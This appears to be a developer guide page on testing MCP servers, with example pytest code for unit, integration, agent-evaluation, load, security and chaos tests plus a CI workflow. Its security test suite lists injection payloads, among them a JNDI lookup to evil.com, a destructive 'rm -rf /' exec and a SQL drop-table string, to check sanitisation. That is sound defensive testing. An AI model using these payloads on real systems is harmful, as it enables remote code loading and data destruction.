
Test

Validate MCP servers for correctness, safety, performance, and AI agent compatibility. Focus on behavior, contracts, and real-world agent interactions through systematic testing approaches.

Testing Philosophy

Core Testing Principles

  • Behavior-driven validation: Test what the server does, not just how it's implemented
  • Contract-first testing: Validate schemas, inputs, outputs, and side effects rigorously
  • Agent-centric evaluation: Test how AI agents actually interact with your tools
  • Production simulation: Test with realistic data, load patterns, and failure scenarios
  • Continuous validation: Integrate testing into development workflow and deployment pipeline

Quality Gates and Success Criteria

  • Functional correctness: All tools produce expected outputs for valid inputs
  • Safety and security: Invalid inputs are rejected, authorization is enforced
  • Performance standards: Latency and throughput meet defined SLOs
  • Agent usability: AI agents can discover, understand, and effectively use tools
  • Reliability: Server handles failures gracefully and maintains availability

Testing Pyramid for MCP Servers

Unit Tests (Foundation - 60-70%)

Purpose: Fast, isolated validation of individual components and business logic

Focus areas:

  • Tool logic and algorithms
  • Input validation and sanitization
  • Error handling and edge cases
  • Configuration management
  • Utility functions and helpers

Example unit test structure:

import pytest
from unittest.mock import patch

from your_server.tools import process_data
from your_server.errors import ServiceUnavailableError  # adjust to wherever your server defines it

class TestProcessDataTool:
    def test_valid_input_processing(self):
        """Test tool with valid input produces expected output"""
        result = process_data("valid input", {"option": "value"})
        assert result.success is True
        assert result.data == "processed: valid input"  # replace with your tool's actual expected output

    def test_invalid_input_rejection(self):
        """Test tool properly rejects invalid input"""
        with pytest.raises(ValueError, match="Invalid input format"):
            process_data("", {})

    def test_edge_case_handling(self):
        """Test tool handles edge cases gracefully"""
        large_input = "x" * 10000
        result = process_data(large_input, {})
        assert len(result.data) <= 1000  # Truncated appropriately

    @patch('your_server.external_api.call_service')
    def test_dependency_failure_handling(self, mock_api):
        """Test tool handles external dependency failures"""
        mock_api.side_effect = ConnectionError("Service unavailable")
        with pytest.raises(ServiceUnavailableError):
            process_data("test", {"use_external": True})

Integration Tests (Structure - 20-30%)

Purpose: Validate MCP protocol compliance and component interactions

Focus areas:

  • MCP protocol message handling
  • Tool discovery and schema validation
  • Resource access and content delivery
  • Authentication and authorization flows
  • Database and external service integrations

MCP protocol integration tests:

import pytest
from mcp.client import McpClient
from your_server import start_server

@pytest.fixture(scope="module", autouse=True)
async def running_server():
    """Start the server once for these tests (the start_server/shutdown API shown is assumed)."""
    server = await start_server()
    yield server
    await server.shutdown()


@pytest.mark.asyncio
class TestMCPIntegration:
    async def test_server_initialization(self):
        """Test server starts and responds to initialization"""
        async with McpClient() as client:
            info = await client.initialize()
            assert info.protocol_version == "0.1.0"
            assert info.server_info.name == "your-server"

    async def test_tool_discovery(self):
        """Test tool discovery returns correct schemas"""
        async with McpClient() as client:
            await client.initialize()
            tools = await client.list_tools()

            assert len(tools) > 0
            process_tool = next(t for t in tools if t.name == "process_data")
            assert process_tool.input_schema is not None
            assert "text" in process_tool.input_schema["properties"]

    async def test_tool_execution_flow(self):
        """Test complete tool execution workflow"""
        async with McpClient() as client:
            await client.initialize()

            result = await client.call_tool(
                "process_data",
                {"text": "test input", "options": {}}
            )

            assert result.is_error is False
            assert "result" in result.content[0].text

    async def test_authorization_enforcement(self):
        """Test authorization is properly enforced"""
        async with McpClient(token="invalid") as client:
            await client.initialize()

            with pytest.raises(PermissionError):
                await client.call_tool("restricted_tool", {})

End-to-End Tests (Top - 10-15%)

Purpose: Validate complete workflows with real configurations and dependencies

Focus areas:

  • Gateway integration and routing
  • Multi-server orchestration
  • Production-like configurations
  • Real external service interactions
  • Performance under realistic load

E2E test example:

import pytest
from test_utils import start_gateway, register_server, create_test_client

@pytest.mark.e2e
@pytest.mark.asyncio
class TestCompleteWorkflow:
    @pytest.fixture
    async def gateway_setup(self):
        """Setup gateway with registered server"""
        gateway = await start_gateway()
        await register_server(gateway, "test-server", "http://localhost:8000")
        yield gateway
        await gateway.shutdown()

    async def test_client_to_server_via_gateway(self, gateway_setup):
        """Test complete client → gateway → server flow"""
        client = create_test_client(gateway_url="http://localhost:4444")

        # Test tool discovery through gateway
        tools = await client.discover_tools()
        assert "process_data" in [t.name for t in tools]

        # Test tool execution through gateway
        result = await client.execute_tool(
            "process_data",
            {"text": "integration test", "options": {"format": "json"}}
        )

        assert result.success is True
        assert "integration test" in str(result.data)

Agent Evaluation and AI Testing

Agent Eval Framework

Purpose: Evaluate how effectively AI agents can discover, understand, and use your MCP tools

Agent Eval provides systematic evaluation of MCP servers from an AI agent perspective, measuring:

  • Discoverability: How easily agents find relevant tools
  • Usability: How successfully agents use tools to complete tasks
  • Reliability: How consistently tools work across different agent interactions
  • Task completion: How well agents accomplish goals using your tools

Agent Eval implementation:

from agent_eval import Evaluator, TaskSet, Agent

class MCPServerEvaluator:
    def __init__(self, server_url: str):
        self.evaluator = Evaluator()
        self.server_url = server_url
        self.agent = Agent(
            model="claude-3-sonnet",
            mcp_server=server_url
        )

    def create_task_suite(self) -> TaskSet:
        """Define evaluation tasks for your MCP server"""
        return TaskSet([
            {
                "name": "data_processing_task",
                "description": "Process user data and return formatted results",
                "input": "Process this CSV data: name,age\\nJohn,25\\nJane,30",
                "expected_capabilities": ["process_data", "format_output"],
                "success_criteria": [
                    "Data is correctly parsed",
                    "Output is properly formatted",
                    "No errors in processing"
                ]
            },
            {
                "name": "error_handling_task",
                "description": "Handle invalid input gracefully",
                "input": "Process this invalid data: !!!invalid!!!",
                "expected_behavior": "graceful_error_handling",
                "success_criteria": [
                    "Error is caught and handled",
                    "Meaningful error message provided",
                    "Agent can recover and suggest alternatives"
                ]
            }
        ])

    async def run_evaluation(self) -> dict:
        """Run comprehensive agent evaluation"""
        task_suite = self.create_task_suite()

        results = await self.evaluator.evaluate(
            agent=self.agent,
            tasks=task_suite,
            iterations=10  # Run multiple times for statistical significance
        )

        return {
            "overall_score": results.overall_score,
            "task_success_rate": results.task_success_rate,
            "tool_usage_efficiency": results.tool_usage_efficiency,
            "error_handling_score": results.error_handling_score,
            "detailed_results": results.task_results
        }
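
A usage sketch, assuming the MCPServerEvaluator class above is in scope and the server is reachable at the URL shown; the thresholds mirror the quality gates defined later on this page:

import pytest

@pytest.mark.agent_eval
@pytest.mark.asyncio
async def test_agent_eval_meets_thresholds():
    """Fail the build if agent-facing quality drops below the agreed bar."""
    evaluator = MCPServerEvaluator(server_url="http://localhost:8000")
    report = await evaluator.run_evaluation()

    assert report["task_success_rate"] >= 0.80      # 80% task completion gate
    assert report["error_handling_score"] >= 0.75   # illustrative threshold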

Cross-Model Validation

Test with multiple AI models to ensure broad compatibility:

@pytest.mark.agent_eval
@pytest.mark.asyncio
class TestCrossModelCompatibility:
    server_url = "http://localhost:8000"  # point at your test deployment
    models = ["claude-3-sonnet", "gpt-4", "gemini-pro"]

    @pytest.mark.parametrize("model", models)
    async def test_model_tool_usage(self, model):
        """Test tool usage across different AI models"""
        agent = Agent(model=model, mcp_server=self.server_url)

        # Test basic tool discovery
        tools = await agent.discover_tools()
        assert len(tools) > 0

        # Test tool usage with standard task
        result = await agent.complete_task(
            "Process the data: name,value\ntest,123",
            available_tools=tools
        )

        assert result.success_rate > 0.8  # 80% success threshold
        assert result.tool_calls > 0
        assert "123" in str(result.output)

Behavioral Testing and Golden Sets

Golden set evaluation for consistent behavior validation:

class GoldenSetTester:
    def __init__(self):
        self.golden_sets = self.load_golden_sets()

    def load_golden_sets(self) -> dict:
        """Load curated test cases with expected outputs"""
        return {
            "data_processing": [
                {
                    "input": {"text": "hello world", "format": "upper"},
                    "expected_output": "HELLO WORLD",
                    "metadata": {"operation": "case_conversion"}
                },
                {
                    "input": {"text": "test@example.com", "format": "email_validation"},
                    "expected_output": {"valid": True, "domain": "example.com"},
                    "metadata": {"operation": "email_processing"}
                }
            ]
        }

    @staticmethod
    def compare_outputs(actual, expected) -> bool:
        """Exact-match comparison; swap in a tolerant or semantic comparison if outputs vary."""
        return actual == expected

    async def validate_against_golden_set(self, tool_name: str) -> dict:
        """Validate tool outputs against golden set"""
        test_cases = self.golden_sets.get(tool_name, [])
        results = []

        for case in test_cases:
            try:
                actual_output = await call_tool(tool_name, case["input"])
                match = self.compare_outputs(actual_output, case["expected_output"])
                results.append({
                    "test_case": case,
                    "actual_output": actual_output,
                    "matches_expected": match,
                    "passed": match
                })
            except Exception as e:
                results.append({
                    "test_case": case,
                    "error": str(e),
                    "passed": False
                })

        passed_count = sum(1 for r in results if r["passed"])
        return {
            "total_tests": len(test_cases),
            "passed": passed_count,
            "pass_rate": passed_count / len(test_cases) if test_cases else 0.0,
            "detailed_results": results
        }
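
A usage sketch, assuming the GoldenSetTester above and your project's async call_tool helper are in scope, that turns each golden set into a release-blocking pytest check:

import pytest

@pytest.mark.asyncio
@pytest.mark.parametrize("tool_name", ["data_processing"])
async def test_golden_sets(tool_name):
    """Golden sets must pass completely before release."""
    tester = GoldenSetTester()
    report = await tester.validate_against_golden_set(tool_name)

    assert report["pass_rate"] == 1.0, report["detailed_results"]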

Performance and Load Testing

Load Testing Strategy

Establish performance baselines and validate under realistic load:

import asyncio
import time

class LoadTester:
    def __init__(self, server_url: str):
        self.server_url = server_url
        self.metrics = {
            "requests_sent": 0,
            "requests_successful": 0,
            "response_times": [],
            "errors": []
        }

    async def single_request_test(self, tool_name: str, params: dict):
        """Execute single request and measure performance"""
        start_time = time.time()

        try:
            result = await call_tool(tool_name, params)
            response_time = time.time() - start_time

            self.metrics["requests_sent"] += 1
            self.metrics["requests_successful"] += 1
            self.metrics["response_times"].append(response_time)

            return result

        except Exception as e:
            self.metrics["requests_sent"] += 1
            self.metrics["errors"].append(str(e))
            raise

    async def load_test(self, tool_name: str, params: dict,
                       concurrent_users: int, duration_seconds: int):
        """Run load test with specified concurrency and duration"""
        end_time = time.time() + duration_seconds
        tasks = []

        while time.time() < end_time:
            # Maintain specified concurrency
            active_tasks = [t for t in tasks if not t.done()]

            while len(active_tasks) < concurrent_users and time.time() < end_time:
                task = asyncio.create_task(
                    self.single_request_test(tool_name, params)
                )
                tasks.append(task)
                active_tasks.append(task)

                # Small delay to prevent overwhelming
                await asyncio.sleep(0.1)

        # Wait for remaining tasks
        await asyncio.gather(*tasks, return_exceptions=True)

        return self.analyze_results(duration_seconds)

    def analyze_results(self, duration_seconds: float) -> dict:
        """Analyze load test results"""
        response_times = self.metrics["response_times"]

        if not response_times:
            return {"error": "No successful responses recorded"}

        sorted_times = sorted(response_times)
        return {
            "total_requests": self.metrics["requests_sent"],
            "successful_requests": self.metrics["requests_successful"],
            "error_rate": len(self.metrics["errors"]) / self.metrics["requests_sent"],
            "avg_response_time": sum(response_times) / len(response_times),
            "p50_response_time": sorted_times[len(sorted_times) // 2],
            "p95_response_time": sorted_times[int(len(sorted_times) * 0.95)],
            "p99_response_time": sorted_times[int(len(sorted_times) * 0.99)],
            "requests_per_second": len(response_times) / duration_seconds if duration_seconds else 0
        }

# Usage in tests
@pytest.mark.performance
@pytest.mark.asyncio
class TestPerformance:
    async def test_single_user_latency(self):
        """Test response times under normal load"""
        tester = LoadTester("http://localhost:8000")

        result = await tester.load_test(
            tool_name="process_data",
            params={"text": "performance test", "options": {}},
            concurrent_users=1,
            duration_seconds=30
        )

        assert result["p95_response_time"] < 0.5  # 500ms SLO
        assert result["error_rate"] < 0.01  # <1% error rate

    async def test_concurrent_users_throughput(self):
        """Test throughput under concurrent load"""
        tester = LoadTester("http://localhost:8000")

        result = await tester.load_test(
            tool_name="process_data",
            params={"text": "load test", "options": {}},
            concurrent_users=10,
            duration_seconds=60
        )

        assert result["requests_per_second"] > 50  # Minimum throughput
        assert result["error_rate"] < 0.05  # <5% error rate under load

Security and Safety Testing

Security Test Suite

Validate security controls and resistance to common attacks:

class SecurityTester:
    """Relies on project helpers (call_tool, call_tool_with_context) and the
    AuthenticationError / RateLimitError exceptions raised by your server."""

    def __init__(self, server_url: str):
        self.server_url = server_url

    async def test_input_injection_attacks(self):
        """Test resistance to injection attacks"""
        injection_payloads = [
            "'; DROP TABLE users; --",
            "<script>alert('xss')</script>",
            "{{7*7}}",  # Template injection
            "${jndi:ldap://evil.com/a}",  # Log4j style
            "'; exec('import os; os.system(\"rm -rf /\")')"
        ]

        for payload in injection_payloads:
            try:
                result = await call_tool("process_data", {"text": payload})

                # Result should be sanitized, not executed
                assert payload not in str(result)
                assert "<script>" not in str(result).lower()
                assert "drop table" not in str(result).lower()

            except ValueError:
                # Input rejection is acceptable
                pass

    async def test_authorization_bypass_attempts(self):
        """Test authorization cannot be bypassed"""
        bypass_attempts = [
            {"token": "invalid_token"},
            {"token": "../../../admin_token"},
            {"user_id": -1},
            {"permissions": ["admin", "all"]},
        ]

        for attempt in bypass_attempts:
            with pytest.raises((PermissionError, AuthenticationError)):
                await call_tool_with_context("admin_tool", {}, context=attempt)

    async def test_rate_limiting(self):
        """Test rate limiting prevents abuse"""
        # Make rapid requests to trigger rate limiting
        tasks = []
        for i in range(100):  # Exceed rate limit
            tasks.append(call_tool("process_data", {"text": f"test {i}"}))

        results = await asyncio.gather(*tasks, return_exceptions=True)

        # Some requests should be rate limited
        rate_limited_count = sum(1 for r in results if isinstance(r, RateLimitError))
        assert rate_limited_count > 0

Chaos Testing and Fault Injection

Test resilience under failure conditions:

import json
from unittest.mock import patch

from requests.exceptions import HTTPError  # or your HTTP client's equivalent


class ChaosTester:
    async def test_dependency_failures(self):
        """Test behavior when external dependencies fail"""
        with patch('external_service.call') as mock_service:
            # Simulate various failure modes
            failure_scenarios = [
                ConnectionError("Connection refused"),
                TimeoutError("Request timeout"),
                HTTPError("500 Internal Server Error"),
                json.JSONDecodeError("Invalid JSON", "", 0)
            ]

            for error in failure_scenarios:
                mock_service.side_effect = error

                result = await call_tool("external_dependent_tool", {"param": "test"})

                # Should fail gracefully with meaningful error
                assert "error" in result
                assert "temporarily unavailable" in result["error"].lower()

    async def test_resource_exhaustion(self):
        """Test behavior under resource constraints"""
        # Test with large inputs to stress memory
        large_input = "x" * (10 * 1024 * 1024)  # 10MB

        try:
            result = await call_tool("process_data", {"text": large_input})

            # Should either process successfully or fail gracefully
            assert result is not None

        except ResourceExhaustedError as e:  # your server's resource-limit exception type
            # Graceful resource exhaustion handling is acceptable
            assert "resource limit" in str(e).lower()

Automated Testing and CI/CD Integration

Continuous Integration Pipeline

Integrate all testing levels into your CI/CD pipeline:

# .github/workflows/test.yml (example)
name: Comprehensive Testing Pipeline

on: [push, pull_request]

jobs:
  unit-tests:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Setup Python
        uses: actions/setup-python@v4
        with:
          python-version: '3.11'

      - name: Install dependencies
        run: |
          pip install uv
          uv pip install -e .[test]

      - name: Run unit tests
        run: |
          pytest tests/unit/ -v --cov=src --cov-report=xml

      - name: Upload coverage
        uses: codecov/codecov-action@v3

  integration-tests:
    runs-on: ubuntu-latest
    needs: unit-tests
    steps:
      # Checkout, Python setup, and dependency install omitted here and in the
      # jobs below for brevity; reuse the steps from the unit-tests job.
      - name: Start test server
        run: |
          python -m src.server &
          sleep 5

      - name: Run integration tests
        run: |
          pytest tests/integration/ -v

  agent-evaluation:
    runs-on: ubuntu-latest
    needs: integration-tests
    steps:
      - name: Run Agent Eval
        run: |
          python -m tests.agent_eval --iterations=5
        env:
          ANTHROPIC_API_KEY: ${{ secrets.ANTHROPIC_API_KEY }}
          OPENAI_API_KEY: ${{ secrets.OPENAI_API_KEY }}

  performance-tests:
    runs-on: ubuntu-latest
    needs: integration-tests
    steps:
      - name: Run performance tests
        run: |
          pytest tests/performance/ -v --timeout=300

  security-tests:
    runs-on: ubuntu-latest
    needs: unit-tests
    steps:
      - name: Run security scans
        run: |
          bandit -r src/
          safety check
          pytest tests/security/ -v

Test Automation Best Practices

Automated test management:

# conftest.py - Pytest configuration and fixtures
import pytest
import asyncio
from unittest.mock import patch

@pytest.fixture(scope="session")
def event_loop():
    """Create event loop for async tests"""
    loop = asyncio.new_event_loop()
    yield loop
    loop.close()

@pytest.fixture
def mock_external_service():
    """Mock external service for isolated testing"""
    with patch('src.services.external_api') as mock:
        mock.get_data.return_value = {"status": "success", "data": "test"}
        yield mock

@pytest.fixture
async def test_server():
    """Start a test server for integration tests (start_test_server is a project-specific helper)"""
    server = await start_test_server(port=8001)
    yield server
    await server.shutdown()

# Parameterized tests for comprehensive coverage
@pytest.mark.parametrize("input_data,expected", [
    ("valid input", "processed: valid input"),
    ("", "error: empty input"),
    ("x" * 1000, "error: input too long"),
])
def test_input_variations(input_data, expected):
    result = process_input(input_data)
    assert expected in str(result)

Testing Standards and Quality Gates

Coverage Targets and Quality Metrics

Establish clear quality thresholds; a sketch for enforcing them as a CI gate follows the list:

  • Unit test coverage: ≥ 85% for business logic, 100% for critical paths
  • Integration test coverage: All MCP protocol interactions and external dependencies
  • Agent evaluation score: ≥ 80% task completion rate across target models
  • Performance targets: P95 latency < 500ms, throughput > 50 RPS under normal load
  • Security validation: 100% of security test cases must pass
  • Error handling: All error scenarios have explicit tests
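
A minimal sketch of the CI gate referenced above, assuming your pipeline writes the collected metrics to a JSON file (the file name and keys are illustrative):

import json
import sys

# Thresholds mirroring the targets listed above
GATES = {
    "unit_coverage": 0.85,       # >= 85% business-logic coverage
    "agent_eval_score": 0.80,    # >= 80% task completion
    "p95_latency_seconds": 0.5,  # < 500 ms
    "throughput_rps": 50,        # > 50 RPS
}

def main(path: str = "test_metrics.json") -> int:
    with open(path) as f:
        metrics = json.load(f)

    failures = []
    if metrics["unit_coverage"] < GATES["unit_coverage"]:
        failures.append("unit coverage below 85%")
    if metrics["agent_eval_score"] < GATES["agent_eval_score"]:
        failures.append("agent eval score below 80%")
    if metrics["p95_latency_seconds"] >= GATES["p95_latency_seconds"]:
        failures.append("p95 latency at or above 500 ms")
    if metrics["throughput_rps"] <= GATES["throughput_rps"]:
        failures.append("throughput at or below 50 RPS")

    for failure in failures:
        print(f"QUALITY GATE FAILED: {failure}")
    return 1 if failures else 0

if __name__ == "__main__":
    sys.exit(main())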

Pre-Release Testing Checklist

Functional Testing

  • [ ] All unit tests passing with required coverage
  • [ ] Integration tests validate MCP protocol compliance
  • [ ] End-to-end workflows complete successfully
  • [ ] Cross-model agent evaluation meets thresholds

Performance Validation

  • [ ] Load tests confirm SLO compliance
  • [ ] Resource usage within acceptable limits
  • [ ] Concurrent user scenarios handled properly
  • [ ] Performance regression tests passing

Security and Safety

  • [ ] Input validation prevents injection attacks
  • [ ] Authorization controls properly enforced
  • [ ] Rate limiting prevents abuse
  • [ ] Audit logging captures required events

Reliability Testing

  • [ ] Chaos tests validate fault tolerance
  • [ ] Dependency failure scenarios handled gracefully
  • [ ] Circuit breakers and timeouts configured
  • [ ] Recovery procedures validated

Agent Compatibility

  • [ ] Agent Eval scores meet minimum thresholds
  • [ ] Tool discovery works across target models
  • [ ] Error messages are agent-friendly
  • [ ] Documentation supports agent understanding

Regression Testing and Continuous Monitoring

Maintain quality over time:

import json


class RegressionTester:
    def __init__(self, baseline_path: str = "baseline_metrics.json"):
        self.baseline_metrics = self.load_baseline(baseline_path)

    def load_baseline(self, path: str) -> dict:
        """Load stored baseline metrics (e.g., a JSON file committed alongside the tests)."""
        with open(path) as f:
            return json.load(f)

    async def detect_regressions(self, current_results: dict) -> dict:
        """Compare current results against baseline"""
        regressions = {}

        for metric, current_value in current_results.items():
            baseline_value = self.baseline_metrics.get(metric)

            if baseline_value and self.is_regression(metric, current_value, baseline_value):
                regressions[metric] = {
                    "current": current_value,
                    "baseline": baseline_value,
                    "regression_percentage": self.calculate_regression_pct(
                        current_value, baseline_value
                    )
                }

        return regressions

    @staticmethod
    def calculate_regression_pct(current: float, baseline: float) -> float:
        """Percentage change of the current value relative to the baseline."""
        return abs(current - baseline) / baseline * 100

    def is_regression(self, metric: str, current: float, baseline: float) -> bool:
        """Determine if current value represents a regression"""
        thresholds = {
            "success_rate": 0.05,  # 5% drop is significant
            "avg_response_time": 0.20,  # 20% increase is significant
            "agent_eval_score": 0.10,  # 10% drop is significant
        }

        threshold = thresholds.get(metric, 0.15)  # Default 15%

        if metric in ["success_rate", "agent_eval_score"]:
            # Lower is worse
            return current < baseline * (1 - threshold)
        else:
            # Higher is worse (latency, error rate)
            return current > baseline * (1 + threshold)
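
A usage sketch for wiring the RegressionTester into the pipeline, assuming a baseline_metrics.json checked into the repository and a hypothetical collect_current_metrics() helper that aggregates the latest run's results:

import pytest

@pytest.mark.asyncio
async def test_no_regressions_against_baseline():
    """Fail the pipeline if key metrics regress beyond their thresholds."""
    current = collect_current_metrics()  # hypothetical helper aggregating the latest run
    tester = RegressionTester()

    regressions = await tester.detect_regressions(current)
    assert not regressions, f"Regressions detected: {regressions}"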

Testing Tools and Infrastructure

Core testing tools:

  • pytest: Primary testing framework with async support
  • pytest-cov: Code coverage measurement and reporting
  • pytest-mock: Mocking and patching capabilities
  • Agent Eval: AI agent evaluation framework
  • locust: Load testing and performance validation (a minimal locustfile sketch follows the next list)
  • bandit: Security vulnerability scanning
  • safety: Dependency vulnerability checking

Infrastructure tools:

  • docker-compose: Reproducible testing environments
  • testcontainers: Integration testing with real dependencies
  • GitHub Actions / Jenkins: CI/CD pipeline automation
  • SonarQube: Code quality and security analysis
  • Grafana/Prometheus: Performance monitoring and alerting
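
For locust (listed above), a minimal locustfile sketch for HTTP-exposed MCP servers; the endpoint path and payload shape are assumptions, so adjust them to your server's actual transport:

# locustfile.py
from locust import HttpUser, task, between

class MCPToolUser(HttpUser):
    """Simulated agent repeatedly invoking a tool over the server's HTTP transport."""
    wait_time = between(0.5, 2.0)  # pause between requests per simulated user

    @task
    def call_process_data(self):
        # Endpoint and body are illustrative; match your server's real API
        self.client.post(
            "/tools/call",
            json={"name": "process_data", "arguments": {"text": "load test", "options": {}}},
        )

Run it with locust -f locustfile.py --host http://localhost:8000 and compare the reported latency percentiles against the SLOs defined above.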


Next Steps: After comprehensive testing, proceed to Package for distribution preparation, then Deploy for production rollout strategies.

See Also: Develop, Best Practices, Package, Deploy, Operate, Secure.